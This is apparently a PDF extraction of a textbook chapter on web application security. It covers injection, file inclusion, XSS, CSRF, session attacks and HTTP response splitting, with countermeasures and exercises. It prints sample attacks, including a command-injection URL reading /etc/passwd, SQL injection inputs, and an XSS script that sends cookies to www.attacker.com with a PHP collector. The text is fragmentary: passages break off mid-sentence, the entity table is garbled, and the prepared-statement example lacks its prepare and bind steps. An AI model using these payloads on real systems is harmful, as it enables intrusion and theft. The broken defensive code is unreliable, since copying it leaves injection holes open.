Web Security PDF
Web Security PDF
Web Security PDF
1 Introduction
A web application is an application that uses the web browser, or user agent,
to access a web server. The application can be realized using a server side
implementation or JavaScript running in the web browser. Often a combination
of the two is used. The programming language used on the server can be any
language, but several languages have been developed with web applications in
mind, e.g., PHP, ASP, JSP and Ruby. The examples here use PHP, but the
theory behind most attacks and counter measures is general and can be applied
to applications written in any language.
When the Internet started to gain popularity, most websites offered static
web pages. The browser downloaded the content, interpreted the HTML code,
and displayed it to the user. However, soon more complex websites were de-
veloped, incorporating more dynamic content. Today, many websites are built
upon user generated content, making the information flow bidirectional. The
server also needs to interpret data provided by users and present it as informa-
tion to other users. This information is often unique to each user, requiring login
support. For personal information it is also important to support robust access
control and authentication of HTTP requests. The wide range of functionality
in modern web applications has had a huge effect on security. Confidentiality
and integrity protection of transported data is supported by SSL, implemented
in all modern browsers. However, web application attacks are often exploiting
vulnerabilities on the application layer and are independent of the use of SSL,
which is enforced on the transport layer. Still, SSL is a good start as it can
protect the data against attacks on the link between two nodes.
This chapter will give an introduction to security issues and possible attacks
related to web applications. For a more comprehensive treatment, there are
several books on the subject, see e.g., [3, 5].
OWASP is an open community focusing on web application security. The
OWASP website (http://www.owasp.org) contains information about many
different aspects of web application security.
Many attacks targeting web applications rely on the fact that the program-
mer has not validated input from the user. The goal of the attacks can be one
1
out of very many, e.g., accessing the actual server, stealing cookies, running
the attackers own programs, dumping databases, etc. Correctly validating user
input, making sure that it is as expected, will defend against many of these
attacks. Best practice is to always assume that user supplied data is always
malicious, and take any necessary precautions based on that. Unexpected input
is not only a potential security threat, but could also crash the application.
Validating user input is often just a matter of using a PHP function on the
supplied string. Thus, protecting against these types of attacks is usually very
easy. The programmer just has to be aware of the potential problem and use
the appropriate function to validate the data.
Attacks on web applications can be divided into several categories, but there
is rarely a clear distinction between the categories and some attacks may fall
into several categories. Moreover, attacks in one category can be used to launch
attacks in other categories. Some attacks primarily targeting the actual server
will first be given, while some attacks more targeting users and sessions will
be given later, after a more thorough treatment of the same origin policy and
session management.
<?php
$value = $_GET[’name’];
echo "nslookup of $value:<br />";
passthru("nslookup $value");
?>
The function passthru() executes the string and passes the result directly to
the standard output, i.e., to the user agent. Since user input is used to run
commands on the server machine, this code will allow an attacker to run any
command on the server, provided that the web server is allowed to run it on the
machine. Requesting the URL
script.php?name=127.0.0.1%3B+cat+%2Fetc%2Fpasswd
will run the command
127.0.0.1; cat /etc/passwd
displaying the file with hashed passwords to the attacker. Even if the hashed
passwords are usually stored in a shadow file today, the example shows the vul-
nerability and even simple commands as listing directories, deleting specific files,
displaying configuration information etc, are a potential threat to the server.
PHP provides two functions that can be used to make sure the above attack
is not possible.
2
• escapeshellcmd($arg) will escape, i.e., precede with backslash, several
special characters that can be used to trick the shell to execute arbitrary
commands.
• escapeshellarg($arg) will put single quotes around the string and es-
capes single quotes inside the string. If this is used as an argument to
a command, it will always be treated as a single argument, avoiding the
situation above.
<?php
$username = $_GET[’name’];
$filename = "/home/users/$username";
readfile($filename);
?>
The function readfile() simply reads the file passed as argument and sends
its content to the standard output. The idea is that each user has a unique
part of a webpage, and the rest of the page is static. The problem is that the
filename is completely determined by the user, without any validation of the
input. An attacker can e.g., pass the filename ../../etc/passwd as a GET
parameter, attempting to retrieve the content of the password file. The fact
that it is possible to use ../ in the filename, allows the attacker to traverse the
filesystem and read any file that the web server is allowed to read. Also the
PHP files used to create the webpages can be read, possibly disclosing database
passwords in the code or perhaps other even more severe vulnerabilities.
PHP provide several functions that can be used to filter paths.
• realpath() will analyze the path, translating ./ and ../ and return an
absolute path. The input /home/users/../../etc/passwd would return
/etc/passwd.
• basename() returns the filename, removing the directory path. The input
/etc/passwd would return passwd.
• dirname() returns the directory, removing the filename from the path.
The input /etc/passwd would return /etc.
Note that none of the functions above will stop an attacker from accessing files in
the same directory. One additional protection is thus to place the files that can
be accessed in a separate directory. Alternatively, access control mechanisms
provided by the underlying operating system can be used to protect files that
should not be accessed. An even better idea is to have a whitelist of accepted
filenames and check that an input matches an entry in the list.
3
1.3 Local and Remote File Inclusion
The PHP function include() allows the programmer to open a file and interpret
the content of that file. This is very useful if several pages on one website partly
contain the same information, e.g., a standard header or footer, but it can also
be used to make parts of the page user dependent. In those cases, the included
filename could be based on information sent in a GET pr POST request. In the
example below, the file to be included is simply sent in a GET request.
<?php
$pagename = $_GET[’page’];
include($pagename);
?>
Requesting the page .../index.php?page=joe.php will result in the script
opening the file joe.php and interpreting its content. In a file inclusion attack,
the adversary takes advantage of the input dependent choice of file to include.
In the local variant of the attacks, another file on the system is passed as value
for the page parameter, while in a remote file inclusion attack, a URL is passed
to a remote file, typically written by the attacker. The remote file could e.g.,
contain <?php passthru(’ls’); ?>, and will then list the current directory on
the server.
A variant of the code above could be to assume that the file included is a
PHP file.
<?php
$pagename = $_GET[’page’];
include($pagename . ".php");
?>
In that case, the attacker would simply pass joe instead of PHP. It would seem
that the attack in this case is restricted to including only PHP files, but this is
not the case. The attacker could e.g., send a modified request.
.../index.php?page=http://www.ietf.org/rfc/rfc2616.txt?
This would result in PHP including the file
http://www.ietf.org/rfc/rfc2616.txt?.php
and since the “?” is a metacharacter in a URL separating the path and query
string with GET parameters, the file would be retrieved. Including local non-
PHP files is also still possible by appending a null character to the file. The
null character defines the end of a string and anything after is by definition not
part of the string. The path with URL encoded query string
.../index.php?page=/etc/passwd%00
could be used to include the password file.
There are two php.ini directives that determine if files can be retrieved
from remote sources.
4
• allow url fopen determines if URLs can be treated as files in any func-
tions that open files.
• allow url include determines if URLs can be treated as files in the func-
tions include(), include once(), require() and require once().
Note that the first has to be set to On in order for the second to be relevant. The
default setting is to enable allow url fopen and disable allow url include.
Prior to PHP 5.2.0, only allow url fopen was used, defaulting to On.
Even with both these settings turned off, local files can be included. Re-
questing .../index.php?page=/etc/passwd would display the system’s pass-
word file since it is local. To specify from which directories PHP is allowed to
access files, the php.ini directive open basedir can be used. Specifying
open basedir = /var/www:/home/joe/public
would restrict PHP to access files to those two directories and their subdirecto-
ries. On Windows, semicolon is used to separate directories.
$uname = $_POST[’username’];
$pass = $_POST[’passwd’];
$result = mysql_query("SELECT * FROM login WHERE
username=’".$uname."’ AND pword=’".$pass."’");
if ($result) {
if (mysql_num_rows($result) == 1) {
session_regenerate_id();
...
}
The code above highlights an important issue when interacting with databases.
The fact that the password is not stored as a hash value with an additional
salt as input to the hash function is a disaster in itself. However, this is not
immediately related to the SQL injection attack. Instead, the issue here is that
data entered by the user is immediately passed to SQL as part of the query.
5
There is nothing that prevents a user from sending data formatted such that
the semantics of the SQL statement is changed. Consider the following POST
request.
POST / HTTP/1.1
Host: www.server.com
...
username=Alice’-- &passwd=
Such a POST request will on the server be translated to the following SQL
query.
SELECT * FROM login WHERE username=’Alice’-- ’ AND pword=’’
The double hyphen is considered to be a comment so the rest of the line is
ignored. Thus, it will have the same meaning as
SELECT * FROM login WHERE username=’Alice’
This will allow an attacker to login as Alice without knowing her password.
Again, lack of input validation is the source of the vulnerability. PHP provides
the function mysql real escape string(), which can be used to escape special
characters, e.g., single and double quotes. While this provides good protection,
care needs to be taken when using integers as they do not have to be surrounded
by single quotes in the query. Using SQLite query(), the function used to send
queries to the SQLite database, a user with a certain numerical ID can be
extracted as follows.
$id = $_POST[’id’];
$id = sqlite_escape_string($id);
$result = sqlite_query($db, "SELECT * FROM users WHERE id={$id}");
If the user supplies the id 0; DELETE * FROM users the query string will be
translated to
SELECT * FROM users WHERE id=0; DELETE * FROM users
since there is nothing in the string to escape. This will execute both queries and
all rows in the table “users” will be deleted. The reason for using SQLite here
and not MySQL is that multiple queries are not allowed in mysql query(). Al-
ways quoting also integers and using type casting to int are possible protections
against this attack.
There are many more examples of what can be done using SQL injection
attacks. Dumps of databases with passwords, either in clear text or hashed,
have been reported many times. This is not just a problem for the users, but
also a problem for the website itself. Many sites depend on users trusting them
with sensitive information, and once this trust is broken, the users may stop
using that particular site or service.
6
1.4.1 Prepared Statements
Some protections have already been given above. Escaping special characters
will protect against most SQL injection attacks. However, there are even better
ways. Using prepared statements the SQL logic can be completely separated
from the data used in the query. Then the attacks will not be possible as
everything that is provided by the user will be treated as data, and not as logic.
This additionally makes the interaction with the database more efficient since
the logic is sent once, and only data is sent for each new query. By preparing a
statement like
SELECT * FROM login WHERE username=? AND password=?
the question marks are used as placeholders for data that will be supplied when
the query is made. Independent of the format of the data, it will still only be
considered as data. When preparing the statement, the question marks are only
valid in certain places. They can not be used for table and column names (which
still opens up for attacks if they have to be dynamically assigned). An example
using MySQL is given below. Note that the MySQLi extension has to be used
as the MySQL extension for PHP does not support prepared statements.
$uname = $_POST[’username’];
$pass = $_POST[’passwd’];
$a = mysqli_connect(’host’,’mysqlUser’,’mysqlPassword’,’users’);
if ($u_name) {
/*User is authenticated*/
session_regenerate_id();
...
If prepared statements are used for all database queries and all user supplied
data is parameterized, then SQL injections are not possible.
2 Same-Origin Policy
One of the most fundamental aspects of web security is the same-origin pol-
icy. This policy prevents documents from one origin to receive information in
7
documents from another origin. The origin is considered to be the properties
protocol, domain name and port. As one example, a document received from
http://evil.com should not be able to read information from a document
received from http://example.com. To see the motivation for this policy, con-
sider the case when there are two windows open at the same time. In this case
it should not be possible for one window to read the cookies corresponding to
another window since this could be used to steal login credentials from that
window. Another example is when firewalls are used. Documents behind a fire-
wall can not be accessed by an attacker. However, if it would be possible for
e.g., JavaScript to read information in documents in other origins, an attacker’s
webpage can contain a script that retrieves information from origins that are
inside a firewall. Since it is the IP of the victim that is used in the request, it
could be possible to bypass the firewall rules.
The policy can differ slightly between different implementations and spe-
cific rules can change between different versions of the same browser. A de-
tailed overview can be found in [8]. Often, the same-origin policy refers to how
JavaScript can access the Document Object Model (DOM) tree for documents in
other domains. The DOM is a representation of a document in a tree structure.
It defines the objects and properties of the HTML elements, and also defines
methods for accessing them. Refer to [7] for an overview. The user agent only
allows JavaScript to read the DOM if the two are associated with the same
origin, i.e., they share protocol, domain and port. The JavaScript code itself is
associated with the origin of the document running the script, but can be down-
loaded from anywhere using <script src="...">. The script will then be able
to access the DOM of the document running the script, but not documents on
the domain from which it was downloaded.
The basic policy in network access is that documents, and JavaScripts in
those documents, in one origin can send information to other origins, but it
cannot read information from another origin. Allowing documents to send in-
formation to other origins is needed for hyperlinks, which sends a GET request
to the domain specified by the link. It has also the consequence that POST
requests can be sent to any domain. This can be used to send cookies and other
pieces of information to a server controlled by an attacker, a common goal in an
XSS attack. It can also be used in the CSRF attack to send authorized requests
appearing to have been initiated by a victim. Disallowing documents to read
information from other origins is very conservative and there are some excep-
tions to this rule. One exception is reading JavaScripts, as mentioned above.
Another exception is the inclusion of images from other domains. Using <img
src="...">, a document can read an image from another origin and include
it in its own DOM. The origin of the image is then the same as the document
itself, even though it originates from another origin. The same applies to style
sheets (CSS), which can be loaded from any domain.
Also for network access within the same origin, there are exceptions. The
actual rules are browser dependent but it is typical to e.g., block access to port
25 (SMTP) to avoid spam. Several other exceptions exist in order to prevent
potential abuse.
8
The parameter document.domain can be set by the documents to a parent
domain of the actual domain. If both document explicitly set this parame-
ter to the same domain, then access will also be granted. As an example,
a.example.com does not have the same origin as b.example.com, so the docu-
ments will not have access to each other by default. However, both documents
can explicitly set the document.domain parameter to example.com in order to
get access to each other. One drawback is of course that any document with
domain ending with example.com can get access to these documents by setting
its own document.domain parameter to example.com. Some browsers allow set-
ting the parameter to com while others require at least two levels of the domain
name.
The same-origin policy for XMLHttpRequest is similar to that of DOM, but
it is not possible to use the document.domain parameter to mutually agree to
make cross-domain requests.
Other contexts that have their own same-origin policy are e.g., Java, Flash
and Silverlight.
A DNS rebinding attack tricks the browser to think that two documents
with different origin have the same origin. This can e.g., allow an attacker to
obtain information about resources on an internal network.
9
remote file inclusion attack, neither can it prevent information retrieval from
other origins as long as they take place on the server before the information is
delivered to the user-agent.
10
used in responses to XMLHttpRequests. The data format is described in RFC
4627 [2]. It is based on JavaScript but is actually language independent since any
language can parse the data. JSON data consists of objects and arrays. Each
object is enclosed in curly brackets, { and }, and has one or several string:value
pairs separated by comma. The value can be an object itself. If one object has
several values, these are given in an array, enclosed in square brackets, [ and
]. This is best illustrated by an example. Below is a JSON representation of a
student’s data.
{
"name":"Sven Svensson",
"status":
{
"avgGrade":"4.5",
"hp":"135"
},
"course grades":
[
{
"course code":"EIT060",
"grade":"5"
},
{
"course code":"EITF05",
"grade":"4"
}
]
}
Recall that XMLHttpRequest can only be used to make calls to servers in the
same origin so the JSON data can only be received from the same origin. The
data to request can be given by the URL, so the student data above can be
requested using e.g.,
http://www.example.com/students?id=123
assuming that Sven Svensson has ID 123.
If instead the data is requested from a domain in another origin, the <script>-
tag must be used since that is not subject to same-origin checks. On the other
hand, the JSON data is not a valid script (although it is valid JavaScript syn-
tax).
JSON with Padding (JSONP) is one way to get around this obstacle. The
idea is to transform the JSON data into a valid script. First, a <script>-tag is
dynamically created in the DOM at the time the data is to be retrieved. The
“src” parameter of the source tag can then include URL-encoded data similar
to the one above in order to specify which data is requested. The server then
embeds the JSON data inside a function call to make it a valid JavaScript. The
11
name of the function can be specified by the user-agent as a callback parameter,
such that it can fit the rest of the JavaScript code in the document.
http://www.example.com/students?id=123&callback=studentData
Using the example data above, the (valid) JavaScript that is returned from the
server would then be
studentData({"name":"Sven Svensson","status":{"avgGrade":"4.5",
"hp":"135"},"course grades":[{"course code":"EIT060",
"grade":"5"},{"course code":"EITF05","grade":"4"}]})
i.e., the data would be the argument to a function call. The document is now free
to do anything with this data if the function has been defined in the document.
The function is executed immediately after it has been received by the document,
known as On-Demand JavaScript. The padding is the extra function call added
by the server. This padding could also be e.g., a variable assignment. Moreover,
in theory the data does not have to be JSON data, it can be anything as long as
it follows the rules set by the JavaScript language and that the resulting response
from the server can be assigned to the “src” parameter of the <script>-tag.
JSONP is very common to use as it more or less makes cross origin requests
both possible and flexible. One drawback is of course that JSONP has to be
supported by the server.
12
and POST requests, the user-agent sends the origin header with information
about the origin of the document. The server can look at this header and
decide if it should send a response. In the response, the server adds the Access-
Control-Allow-Origin header, specifying the same origin that was sent in the
request origin header. This tells the user-agent that the document is allowed to
receive data from the server. The server can also choose to send a wildcard (*)
indicating that any domain is allowed to request the data.
An example of a HTTP request and a HTTP response using CORS is given
below.
HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: http://www.example.com
For requests that are not simple, the user-agent must first make a preflight re-
quest in order to check which methods are allowed. If the request to be made is
e.g., a PUT or a DELETE request, the user-agent checks whether these requests
are allowed before actually making them. Also, if headers other than simple
headers are to be used, e.g., custom headers, there is also a preflight request to
determine if these headers are allowed in a cross-domain request. The headers
used in the preflight requests are Access-Control-Request-Method to indicate the
method to be used and Access-Control-Request-Headers to indicate which head-
ers that will be used. Corresponding headers, Access-Control-Allow-Methods
and Access-Control-Allow-Headers, are sent in the response to determine what
is allowed. Moreover, to avoid having the user-agent making unnecessarily many
preflight requests, the server can use the Access-Control-Max-Age header to in-
dicate for how long time, in seconds, the preflight information can be cached by
the user-agent. The preflight request uses the OPTIONS method. An example
is given below.
13
OPTIONS /students/ HTTP/1.1
Host: www.server.com
...
Origin: http://www.example.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: X-SPECIALHEADER
HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: http://www.example.com
Access-Control-Allow-Methods: GET, PUT, DELETE
Access-Control-Allow-Headers: X-SPECIALHEADER
Access-Control-Max-Age: 3600
If the document wants to send a DELETE request within one hour, a new
preflight request is not necessary since the user-agent already knows that the
http://www.example.com origin is allowed to make DELETE requests and this
information can be cached for one hour.
By default, an XMLHttpRequest does not send a cookie in a request, but
it can be optionally added by the script. However, responses to requests with
cookies are not accepted by the user-agent unless the response includes the
Access-Control-Allow-Credentials header with the value true. Moreover, the
response must also set an explicit origin for the Access-Control-Allow-Origin
header. If a wildcard is used, the user-agent also rejects the response (i.e.,
its content is not made available to the script). The Access-Control-Allow-
Credentials header allows the server to control if user specific access control can
be used in the cross-origin requests.
3 Sessions
The HTTP protocol is stateless, meaning that there is no inherent memory that
connects two subsequent HTTP requests. In many web applications, an HTTP
response need to be dependent, not only on the corresponding request, but on
many previous requests. An example is a web store, where the customers put
items in a virtual shopping cart. Items need to stay in the cart as the user con-
tinues to browse the store. Another example, more directly related to security,
is websites which require authentication. A logged in user should be able to
log in once and then browse the websites staying logged in. Basic and Digest
authentication, which are both built into the HTTP protocol, accomplish this
by sending login credentials with each request. While the security of these solu-
tions is enough in many situations, they do not allow for session management.
Moreover, they are not very flexible and the user interface is not customizable.
Sessions are used to keep users logged in, without having to send the login
credentials with every request (in some sense this is still done), and to allow
14
the server and the browser to keep a state with information about previous
actions. Often, a session can be initialized and used before a user has logged in,
and continued after the user is logged in. More privileges are then given to the
user once authenticated and logged in. A simple variable can be used to know
whether the user is logged in or not.
Session information can be stored on the client side in two main ways.
• Cookies: This is the most common alternative for session management
and the primary use of cookies. They can also be used for user tracking,
but this is just a special case of session management.
• URL parameters: The session is maintained by sending session infor-
mation in the URL. Every time a relative link is followed, the session
information is attached in the query string of a GET request. The rel-
ative links are automatically rewritten each time a page is generated to
contain the correct session ID. If forms are posted, a hidden field is used
to send the session ID to the server.
15
session into the superglobal variable $ SESSION. With the php.ini directive
session.auto start, sessions are automatically started without having to use
session start(). The default name of a session in PHP is PHPSESSID, but
this can be changed using the session.name directive in php.ini.
A small example of session handling in PHP is given below, where the number
of times a user has visited a page (during one session) is counted.
<?php
session_start();
if isset($_SESSION[count]) {
$_SESSION[’count’]++;
}
else {
$_SESSION[’count’] = 1;
}
?>
The function session destroy() can be used to remove the session ID and
delete the parameters from the server. The fact that session parameters are
stored on the server is a potential security threat. Anyone with access to the
server has also access to the session parameters for users with an open session.
The use of cookies and/or URL parameters to realize a session, can be con-
figured in the php.ini file using the directives
• session.use cookies: Specifies if cookies should be used to transmit
the session ID. Default is “1”.
• session.use only cookies: Specifies if cookies should be the only way
to store the session ID on the client. If this is set to “1”, a session ID sent
in the URL will not be accepted. Default is “1” since PHP 5.3.0.
• session.use trans sid: Specifies if relative links should be transpar-
ently rewritten to contain the session ID. Default is “0”.
16
currently used by a user. By submitting the session ID in a request the attacker
will look like the user to the server. This is in many ways the same thing as
breaking the password, though there is an important difference, namely that
once the session is terminated, the attacker can no longer impersonate the user
(without learning the session ID again). Any attacks that require retyping the
password will not work. Often, websites require you to type the old password
if you want to change it.
There are several ways of learning the session ID of a user. The attacks
can be divided into those that force a victim to use a session ID chosen by the
attacker, called session fixation, and attacks that attempt to learn the session
ID already in use, called session hijacking. Session fixation attacks starts before
the victim logs in, while session hijacking attacks start after the victim logs in.
<?php
if (!isset($_SESSION[’ServGen’])) {
session_destroy();
}
session_regenerate_id();
$_SESSION[’ServGen’] = TRUE;
?>
However, even with this protection, an attack would be possible if the attacker
initializes the session before the ID is sent to the victim. The new attack would
then proceed as follows.
17
1. The attacker visits the target server.
2. The target server sends an ID generated by the server. The session ID is
put in all relative links (and perhaps also in a cookie).
3. The attacker takes the server generated ID “SID” and tells the victim to
visit the target server using the link
www.server.com/script.php?PHPSESSID=SID.
4. The victim clicks the link and is directed to the target server, sending SID
as session ID in a GET parameter. The victim is now using the session
initiated by the attacker. As before, the victim logs into his/her account
on the server.
5. Since the attacker knows the server generated session ID used between the
victim and the target server. The attacker can now send requests to the
server, logged in as the victim.
Clearly, it is not enough to use only server generated session IDs. A simple
protection against this attack is to generate a new ID every time privileges are
changed.
<?php
session_regenerate_id();
$_SESSION[’logged_in’] = TRUE;
?>
Then, in step 5, the attacker will try to use an old ID, which does not correspond
to the logged in victim.
Another protection is of course to not allow the session ID to be sent in
the URL at all. This is accomplished using session.use only cookies = 1 as
discussed in Section 3.1. This of course comes with the drawbacks with only
allowing cookies to be used for session management
There is a temporal issue in the attack that can be used to limit the usefulness
of the attack. In step 5 above it is required that the session is still valid,
otherwise the attacker will not be logged in as the victim. Servers can provide
a logout function that removes the session.
<?php
if ($_GET[’logout’]) {
session_destroy();
}
?>
The protection is of course dependent on users actually using the logout func-
tionality.
18
3.2.2 Session Hijacking
In a session hijacking attack, the adversary learns a session ID that is currently
used by a victim and a target server. This can be done in many ways and
this section will cover the two simplest attacks, namely session prediction and
session sniffing. Cross site scripting (XSS) attacks can also be used for session
hijacking, but XSS attacks are more general and can be used for many other
purposes as well. (XSS is how it is done, while session hijacking is what is
accomplished.) For this reason, XSS will be treated separately in Section 4.
In session prediction, the attacker simply guesses the session ID. This can be
feasible if the generated IDs are not random enough. If e.g., a counter is used
on the server side, a known session ID gives full information about subsequent
IDs. For session IDs based on a function of the user name and e.g., a time
stamp, the number of IDs that have to be guessed until a valid ID is found
is very limited. By analyzing several known valid session IDs, an attacker can
figure out how they are generated and predict values of unknown session IDs.
In PHP, the developer can set the session ID using the function session id().
The best protection against this attack is to let the server determine the session
ID randomly.
In session sniffing, the attacker eavesdrops the connection between the victim
and the server. Unless some confidentiality protection is used, HTTP requests
contain the cookies in unencrypted form. Internet traffic is routed through sev-
eral nodes, and every node can potentially read what is in a packet. However,
Internet routers are not as critical as unencrypted wireless networks. An at-
tacker can just eavesdrop the unencrypted traffic, and when a cookie is found,
that session can be stolen. Wired switched networks are almost as vulnerable
if an ARP spoofing attack is used. The obvious protection is to always encrypt
the traffic using e.g., SSL. Note that it is not sufficient to only use SSL during
login, when username and password is sent, it must be enabled during the full
session.
19
and Flash. Still, the description below will focus on JavaScript. There are
many different variants of XSS and they are typically divided into non-persistent
and persistent cross-site scripting attacks. Both take advantage of insufficient
validation of data supplied by users to the web server.
2. The victim visits the website and gets presented with the information
provided by the attacker, including the JavaScript.
3. The victim’s browser executes the script and sends the victim’s cookie to
the attacker.
4. The attacker can use the cookie to authenticate as the victim to the server.
20
The injected script can be as follows.
<script>
document.location = ’http://www.attacker.com/recCookie.php?text=
’+document.cookie;
</script>
This will redirect the browser to a server controlled by the attacker, downloading
the document recCookie.php, and sending the cookie in the query string of the
GET request. The name of the submitted parameter is text. The cookie will
be a session cookie that the victim has received from www.server.com. The
recCookie.php on the attacker’s server can be a simple document storing the
cookie to a file.
<?php
$fp = fopen("c.txt","w");
fprintf($fp,"%s",$_GET[’text’]);
fclose($fp);
header("Location: http://www.server.com"); //redirect
?>
To hide the cookie theft, the browser can be redirected back. Another variant
of an XSS attack is to replace the content of the webpage.
<script>
document.body.innerHTML=
’<iframe src="http://www.attacker.com"
width="100%"
height="100%"
frameborder="0" />’;
</script>
This code will replace the HTML with another webpage. As the address bar
will contain the address of the original webpage (www.server.com), this could
be very effective in e.g., a phishing attack.
21
• ’<’ is translated to ’<’
• ’>’ is translated to ’>’
• ’&’ is translated to ’&’
• ’”’ is translated to ’"’
Using the argument ENT QUOTES, also single quotes are translated (to ’'’)
The function htmlentities() is similar but additionally translates all other
characters that can be expressed as an entity in HTML. An alternative is to
use the function strip tags() which simply removes all HTML and PHP tags
from a string.
When cookies are stolen using the XSS attack, they are accessed using
JavaScript and document.cookie. If JavaScript is not used by the webpage to
access cookies, the session management cookie can be declared as “HttpOnly”.
GET / HTTP/1.1
host: www.server.com
...
Set-Cookie: PHPSESSID=j8if9j4kbttk77s5h7vv9vnfp2; path=/; HttpOnly
...
Then, the browser will not allow access to the cookie using JavaScript. Sup-
port for this must be implemented in the browser, which is the case in modern
browsers. In PHP, the cookies can be set as HttpOnly using the php.ini direc-
tive session.cookie httponly = 1, but it can also be given as an argument
to setcookie(). However, the default behaviour is to allow JavaScript to ac-
cess cookies. Clearly, this protection is solely focused on cookie stealing, and
attempts to limit the damage that can be done when the web page is vulnerable
to XSS attacks. The content security policy is a much more general and robust
way of protecting against these attacks.
22
The information is sent in a HTTP header named Content-Security-Policy.
However, some experimental implementations instead choose to use the alter-
native X-Content-Security-Policy or X-WebKit-CSP headers.
The information given in the header consists of a directive name and a
directive value. The name controls what to be restricted and the value gives
the actual restrictions. The following are some examples of directive names and
their meanings.
The values can be domains to the resources, bit there are also some special
values that can be used. The ’self’ value is used to restrict sources to the
origin the document was fetched from. The ’unsafe-inline’ value represent
content that is provided inline in the document and not referred to using a
src attribute. This applies to scripts and stylesheets. When CSP is used, the
client will automatically ignore all scripts and stylesheets that are given inline,
and the web server must explicitly allow this. Allowing inline scripts will not
provide any protection against XSS attacks though. The ’unsafe-eval’ value is
used to allow dynamic code evaluation, which is by default not allowed when
CSP is used. The ’none’ value does not match anything and thus forbids the
corresponding content altogether.
If all sources used by a webpage resides in the same origin the following
header should be sent.
23
Content-Security-Policy: default-src ’self’; object-src ’none’;
script-src *.example.com;
img-src images.example.com;
The header can be set in the .htaccess file and will apply to all documents that
the .htaccess file applies to.
24
In order to create a useful request in step 1, the attacker examines how
requests are handled on the vulnerable server. Assume, as an example, that
the vulnerable server is a bank. When transferring money from one account to
another, a POST request is used.
toClear=6352&toAcc=46718259&amount=1000
The above request will transfer SEK 1000 to a specified account and clearing
number. Note that, if the PHP superglobal variable $ REQUEST is used to read
the data, then the data can just as well be sent in a GET request.
<img src="...action.php?toClear=8362&toAcc=83712539&amount=1000">
The result is that the website will contain a broken link, but the request will
still be made to the vulnerable server. If the victim is logged into the bank when
visiting the attacker’s website, the cookie will be sent with the request and the
money transfer will be made.
25
Another protection is to check the referer header. When a request is made,
the browser attaches a referer header containing the URL from which the request
was made. The server can check so that the request was made from the same
(or a white listed) site. This protection relies on the browser to actually send
the header, which is not always the case. This gives a design decision. In lenient
referer validation, the server would accept the request also if there is no header
while in strict referer validation, the request would be denied. In [1], it was
observed that the referer header was suppressed in about 3%-11% in all HTTP
request, but was much less often suppressed in HTTPS request (0.05%-0.22%).
Thus, strict referer validation is a feasible counter measure if an SSL connection
is used. A potential problem is that security vulnerabilities in browsers could
make it possible for an attacker to spoof the header.
One other common solution is to use a secret validation token. The idea is
that the request must contain some value that is not accessible to the attacker.
The session ID is one such value. As the attacker’s website and the target
website belong to different origins, a script on the attacker’s website will not be
able to access the cookie information. Remember that the attack relies on the
user (browser) sending the cookie automatically in all requests. Making sure
that the session ID is sent as data in all requests, the server knows that the
request comes from a legitimate source. Instead of using the session ID, random
tokens can just as well be used. This type of protection is very common.
The server can also demand reauthentication before certain requests are
made, e.g., when important settings are changed. Using a CAPTCHA is a
similar solution which verifies that a human is authorizing the request and it is
not made automatically by e.g., a JavaScript.
Users can also protect themselves from this attack. The attack require that
users are logged in to one website (the target), while visiting another (the at-
tacker’s website). By always making sure to log out, thereby ending the session
and deleting the cookie, the requests will not contain a session cookie. Unfor-
tunately, for convenience, many websites use persistent cookies, allowing users
to stay logged in even after shutting down and restarting the browser. This
requires the users to explicitly log out.
26
by a newline, and a new HTTP response starts on a new line, it is possible for an
attacker to control the headers of a HTTP response and also to create a second
response. A thorough overview of HTTP response splitting is given in [4].
There are two typical situations when user supplied data is used in HTTP
responses, namely in a redirection using the location header and when setting
a value in a new cookie. This overview will consider the former. Suppose that
some input controlled by the user is used to redirect a webpage to another page,
e.g., the user has the option to change the language on the webpage. If the
default language is English, then Swedish can be chosen using a redirect from
redirect.php below.
$x=_GET[’language’]
header("Location: http://www.example.com/index_lang.php?lang=$x");
Since the language can be sent as a parameter in a GET request, an attacker
can control it. The location header will be present in the HTTP response so the
response can also be controlled. In the attack, the response is manipulated such
that a new HTTP response is constructed. Assume that the $lang variable is
specially crafted and that the request (Req1) is as follows:
GET /redirect.php?lang=swedish%0d%0aContent-Length:%200%0d%0a
%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Length:%2032%0d%0a%0d%0a
<html>AttackerCraftedPage</html> HTTP/1.1
Host: www.example.com
...
...
Then, when the redirect HTTP response is sent to the user agent, it will look
like two different responses.
HTTP/1.1 200 OK
Content-Length: 32
<html>AttackerCraftedPage</html>
Thus, the conclusion so far is that the attacker has the ability to create two re-
sponses by embedding his own code into the location header. The first response
can only be partially controlled by the attacker. However, he has full control
over everything in the second response. Still, this does not constitute much of
an attack since both responses are sent back to his own user-agent. In order to
turn this into something useful (for the attacker), it must be noted that only
one request has been sent, but two responses have been returned. The second
27
Figure 1: An example of the HTTP communication in a HTTP response split-
ting attack.
response does not correspond to any request. To fix this, the attacker sends a
new request (Req2) immediately after the first request is sent.
1. The attacker sends the two HTTP requests to the server, via the proxy.
2. The proxy forwards the requests to the server.
3. The server responds with two responses, but the first response is subject
to the attack and will be interpreted as two responses in itself. Thus, the
proxy will see them as three responses.
4. Since the proxy got two requests from the attacker, it will forward the first
two responses sent from the server. The proxy also caches these responses
to avoid forwarding the same request in the (near) future.
5. Some time later, the victim will request /index.html.
6. Since the response to this request is in the proxy’s cache, it will return
this response without contacting the server.
The payload in the attacker crafted response can be anything. It can be e.g.,
a phishing attempt when the attacker tries to mimic another page, a JavaScript
that steals the user’s session cookie (an XSS attack), a defacement resulting in
a DOS attack or anything else.
28
It must be noted that Figure 1 and the above summary only serves as an
illustrating example of the attack. Depending on the proxy that is used, and
also the attack scenario and environment, the steps may have to be adjusted.
One additional step that can be added in the very beginning is to make sure
that the proxy’s cache is flushed and does not contain the response to the second
request. More details on practical aspects can be found in [4].
Exercises
Exercise 301 Assume that some files included by the function include() are
hosted by your grandparents’ webserver. Thus the option allow url include
must be set to on. Moreover, the filenames are submitted to your script using
GET. Explain how you would protect your webpage against remote file inclusion
from a malicious user.
Exercise 302 What are prepared statements and why should they be used in
SQL queries?
Exercise 303 There are mainly three ways to bypass the same-origin policy.
Compare them in terms of how clients and servers must actively take part in
the bypassing technique.
Exercise 304 Consider the following simplification of the CORS protocol: The
user-agent sends the cross-domain request indicating which domain that is mak-
ing the request. If the request is allowed, then the cross domain server can just
send back the data and if it is not allowed it refuses. Thus, the Access-Control-
Allow-Origin header in the response is not used? What would be the problem in
this simplification, i.e., removing the Access-Control-Allow-Origin in responses?
